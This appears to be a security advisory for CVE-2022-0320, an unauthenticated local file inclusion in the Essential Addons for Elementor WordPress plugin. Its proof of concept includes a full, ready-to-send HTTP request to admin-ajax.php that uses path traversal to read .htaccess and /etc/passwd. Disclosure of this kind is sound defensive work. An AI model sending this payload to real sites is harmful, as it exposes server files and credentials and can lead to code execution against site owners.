Essential Addons for Elementor < 5.0.5 – Unauthenticated LFI | CVE 2022-0320

Description

The plugin does not validate and sanitise some template data before it them in include statements, which could allow unauthenticated attackers to perform Local File Inclusion attack and read arbitrary files on the server, this could also lead to RCE via user uploaded files or other LFI to RCE techniques.

Proof of Concept

- Create a simple page and edit with Elementor
- Add a Post Grid with the Show Load More option enabled (in the Layout Settings section of the widget, default is disabled)

- As an unauthenticated user, navigate to that page and intercept the request made when clicking the Load More button
- Change the template_info[file_name] parameter with a payload such as ../../../../../../.htaccess, ../../../../../../../../etc/passwd etc (the template_info[name] is also vulnerable)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 396
Connection: close

action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid

The ajax_eael_product_gallery AJAX action (Product Grid widget) is also affected